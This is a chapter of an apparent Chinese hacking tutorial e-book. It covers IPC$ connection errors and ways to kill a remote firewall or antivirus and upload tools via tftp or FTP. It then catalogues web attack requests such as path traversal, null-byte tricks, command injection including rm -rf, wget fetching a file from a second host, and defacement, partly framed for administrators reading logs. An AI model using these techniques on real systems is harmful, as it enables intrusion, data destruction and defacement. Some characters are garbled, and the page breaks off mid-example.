贝壳电子书 > 文学历史电子书 > 30天打造专业红客 >

第11章

30天打造专业红客-第11章

小说: 30天打造专业红客 字数: 每页4000字

按键盘上方向键 ← 或 → 可快速上下翻页,按键盘上的 Enter 键可回到本书目录页,按键盘上方向键 ↑ 可回到本页顶部!
————未阅读完?加入书签已便下次继续阅读!



    错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码
    我们现在已经了解了ipc失败的原因,我们知道稍微有一点安全意识的网络管理员都会关闭掉共享,不会给你机会用简单的ipc连接进入他的机子,当然也不排除了哈^_^,而如果他屏蔽掉了ipc共享并且开了很少的服务(或者根本禁止了许多可以利用的服务),就算你通过某种方法比如说溢出攻击,得到了权限,进入了系统,这时你添加一个账号也没什么意义。想用ipc连接上传工具,却发现连续的报错,错误1326和错误67比较简单,容易对付。如果碰到对方开了防火墙,也就是(错误67),远程连接不上,我们怎么办呢?这里提供几种办法, 
    1、杀掉远程主机中的防火墙,如果对方安装了resouce kit 那么我们就可以用tlist 和kill 两个命令来找到并且杀掉防火墙的进程。 
    2、利用tftp。并不是说有的管理员都安装了resouce kit;那我们怎么办呢?我们知道2000是自带的tftp,我们可以用tftp来上传工具,如tlist 、kill等等,然后关闭防火墙和杀毒软件 
    3、利用自己的ftp。我们还可以自己驾一个ftp服务器,然后用远程的计算机反过来ftp我们自己的机子,达到上传工具的目的。然后杀掉进程。。。(其实已经没必要了)剩下的就随你的便了。 
    上面的几种解决办法也只是假设,因为一般的管理员都会想办法禁止windows自带tftp客户端的使用,(具体参阅这篇帖子:91one/dvbbs/dispbbs。asp?boardid=17&id=1428)这样给我们就有点麻烦。但有时候还是有用的哦 
    '第13天'80端口攻击总结
    我将描述每种攻击的作用,和其怎样利用这些漏洞进行攻击(注意host的意思你应该懂吧)
    (1)'。' '。。' 和 '。。。' 请求 
    这些攻击痕迹是非常普遍的用于web应用程序和web服务器,它用于允许攻击者或者蠕虫病毒程序改变web服务器的路径,获得访问非公开的区域。大多数的CGI程序漏洞含有这些'。。'请求。 
    Example: 
    host/cgi…bin/lame。cgi?file=。。/。。/。。/。。/etc/motd 
    这个列子展示了攻击者请求mosd这个文件,如果攻击者有能力突破web服务器根目录,那么可以获得更多的信息,并进一步的获得特权。
    (2)'%20' 请求 
    %20是表示空格的16进制数值,虽然这个并不代表你能够利用什么,但是在你浏览日志的时候会发现它,一些web服务器上运行的应用程序中这个字符可能会被有效的执行,所以,你应该仔细的查看日志。另一方面,这个请求有时可以帮助执行一些命令。 
    Example: 
    host/cgi…bin/lame。cgi?page=ls%20…al| 
    这个列子展示了攻击者执行了一个unix的命令,列出请求的整个目录的文件,导致攻击者访问你系统中重要的文件,帮助他进一步取得特权提供条件。
    (3)'%00' 请求 
    %00表示16进制的空字节,他能够用于愚弄web应用程序,并请求不同类型的文件。 
    Examples: 
    host/cgi…bin/lame。cgi?page=index。html 
    这可能是个有效的请求在这个机子上,如果攻击者注意到这个请求动作成功,他会进一步寻找这个cgi程序的问题。 
    host/cgi…bin/lame。cgi?page=。。/。。/。。/。。/etc/motd 
    也许这个cgi程序不接受这个请求,原因在于它要检查这个请求文件的后缀名,如:html。shtml或者其他类型的文件。大多数的程序会告诉你所请求的文件类型无效,这个时候它会告诉攻击者请求的文件必须是一某个字符后缀的文件类型,这样,攻击者可以获得系统的路径,文件名,导致在你的系统获得更多的敏感信息 
    host/cgi…bin/lame。cgi?page=。。/。。/。。/。。/etc/motd%00html 
    注意这个请求,它将骗取cgi程序认为这个文件是个确定的可接受的文件类型,一些应用程序由于愚蠢的检查有效的请求文件,这是我们常用的方法。 
    (4)'|' 请求 
    这是个管道字符,在unix系统用于帮助在一个请求中同时执行多个系统命令。 
    Example: 
    # cat access_log| grep …i '。。' 
    (这个命令将显示日志中的“。。“请求,常用于发现我们和蠕虫攻击) 
    常可以看到有很多web应用程序用这个字符,这也导致IDS日志中错误的报警。 
    在你的程序仔细的检查中,这样是有好处的,可以降低错误的警报在入侵检测系统中。 
    下面给出一些列子: 
    host/cgi…bin/lame。cgi?page=。。/。。/。。/。。/bin/ls| 
    这个请求命令执行,下面是一些变化的列子 
    host/cgi…bin/lame。cgi?page=。。/。。/。。/。。/bin/ls%20…al%20/etc| 
    这个请求在unix系统中列出/etc目录的所有文件 
    host/cgi…bin/lame。cgi?page=cat%20access_log|grep%20…i%20'lame' 
    这个请求cat命令的执行并且grep命令也将执行,查询出”lame' 
    (5)';' 请求 
    在unix系统,这个字符允许多个命令在一行执行 
    Example: 
    # id;uname …a 
    (执行id命令后,紧跟着执行uname命令) 
    一些web程序用这个字符,可能导致在IDS日志中失败的警告,应该仔细的检查web程序,让IDS警报失败的几率降低
    (6)'' 请求 
    应该检查你的日志记录中这两个字符,众多的原因中,首要的一个是这个字符表明了添加数据在文件中 
    Example 1: 
    # echo 'your hax0red h0 h0' 》》 /etc/motd (请求写信息在motd这个文件中) 
    一个攻击者可以容易的用象上面的这个请求篡改你的web页面。比如著名的RDS exploit常被攻击者用于更改web主页面。 
    Example 2: 
    host/something。php=Hi%20mom%20Im%20Bold! 
    你会注意到这里html语言的标志,同样用了“〈”,“〉”字符,这种攻击不能导致攻击者对系统进行访问,它迷惑人们认为这是个合法的信息在web站点中(导致人们在访问这个联结的时候访问到攻击者设定的地址,这种请求可能会被转变成16进制的编码字符形式,使攻击的痕迹不那么明显)
    (7)'!'请求 
    这种字符请求常用语对SS(Server Side Include) I进行攻击,如果攻击者迷惑用户点击被攻击者设定的联结,和上面的一样。 
    Example: 
    host1/something。php= 
    这个列子是攻击者可能会做的,它让一个host2站点上的文件看起来是来自于 host1上面的(当然,需要访问者访问这个被攻击者设定的联结。这种请求可能被转化成16进制的编码伪装,不易发现) 
    同时,这种方式也可以以web站点的权限执行命令 
    Example: 
    host/something。php= 
    这个列子在远程的系统上执行“id'的命令,它将显示这个web站点用户的id,通常是”nobody'或者“www' 
    这种形式也允许包含隐藏文件。 
    Example: 
    host/something。php= 
    这个隐藏文件。htpasswd不会被显示出来;Apache建立的规则会拒绝这种以。ht 形式的请求,而SSI标志会绕过这种限制,并导致安全问题 
    (8)' 这种攻击用于试图在远程的web应用程序中插入PHP程序,它可能允许执行命令,这取决于服务器的设置,和其他起作用的一些因素(比如php设置为安全模式) 
    Example: host/something。php= 
    在某些简单的php应用程序中,它可能会在远程系统上以web站点用户的权限执行本地命令 
    (9)'‘' 请求 
    这种字符后面常用在perl中执行命令,这个字符在web应用程序中不是经常的使用,所以,如果看到它在你的日志中,应该非常小心 
    Example: 
    host/something。cgi=‘id‘ 
    一个perl写的有问题的cgi程序,会导致执行id命令 
    下面是针对管理员说的;因为现在很多网管都在看这个;所以我觉得有必要写一点;当然也是让你知道你的对手有哪些着数了;呵呵。我只是罗列了一些攻击后的痕迹;当然不能罗列所有了
    '/bin/ls' 
    这个命令请求整个路径,在很多的web应用程序中都有这个漏洞,如果你在日志中很多地方都看到这种请求,很大的可能性是存在远程执行命令漏洞,但并不一定是个问题,也可能是个错误的警报。再一次提醒,写好的web应用程序(cgi;asp;php。。。etc)是安全的基础 
    Example: 
    host/cgi…bin/bad。cgi?doh=。。/。。/。。/。。/bin/ls%20…al| 
    host/cgi…bin/bad。cgi?doh=ls%20…al; 
    'cmd。exe' 
    这是一个windows的shell;一个攻击者如果访问并运行这个脚本,在服务器设置允许的条件下可以在windows机器上做任何事情,很多的蠕虫病毒就是通过80端口,传播到远程的机器上 
    host/scripts/something。asp=。。/。。/WINNT/system32/cmd。exe?dir+e: 
    '/bin/id' 
    这是个2进制的文件,它的问题和/bin/ls一样,如果你在日志中很多地方都看到这种请求,很大的可能性是存在远程执行命令漏洞,但并不一定是个问题,也可能是个错误的警报。 
    它将显示属于哪个用户和属于哪个组 
    Example: 
    host/cgi…bin/bad。cgi?doh=。。/。。/。。/。。/bin/id| 
    host/cgi…bin/bad。cgi?doh=id; 
    '/bin/rm' 
    这个命令可以删除文件,如果不正确的使用是非常危险的 
    Examples: 
    host/cgi…bin/bad。cgi?doh=。。/。。/。。/。。/bin/rm%20…rf%20*| 
    host/cgi…bin/bad。cgi?doh=rm%20…rf%20*; 
    'wget and tftp' 命令 
    这些命令常被攻击者用来下载可能进一步获得特权的文件,wget是unix下的命令,可能被用来下载后门程序,tftp是unix和nt下的命令,用来下载文件。一些IIS蠕虫通过tftp来复制自身传播病毒到其他的主机 
    Examples: 
    host/cgi…bin/bad。cgi?doh=。。/。。/。。/。。/path/to…wget/wget%20host2/Phantasmp。c| host/cgi…bin/bad。cgi?doh=wget%20hwa…security/Phantasmp。c; 
    'cat' 命令 
    这个命令用来查看文件内容,常用来读重要的信息,比如配置文件,密码文件,信用卡文件和你能够想到的文件 
    Examples: host/cgi…bin/bad。cgi?doh=。。/。。/。。/。。/bin/cat%20/etc/motd| host/cgi…bin/bad。cgi?doh=cat%20/etc/motd; 
    'echo' 命令 
    这个命令常用于写数据到文件中,比如“index。html” 
    Examples: host/cgi…bin/bad。cgi?doh=。。/。。/。。/。。/bin/echo%20'fc…#kiwis%20was%20here'%20》》%200day。txt| host/cgi…bin/bad。cgi?doh=echo%20'fc…#kiwis%20was%20here'%20》》%200day。txt; 
    'ps' 命令 
    列出当前运行的进程,告诉攻击者远程主机运行了那些软件,以便从中得到一些安全问题的主意,获得进一步的权限 
    Examples: host/cgi…bin/bad。cgi?doh=。。/。。/。。/。。/bin/ps%20…aux| host/cgi

返回目录 上一页 下一页 回到顶部 0 0

你可能喜欢的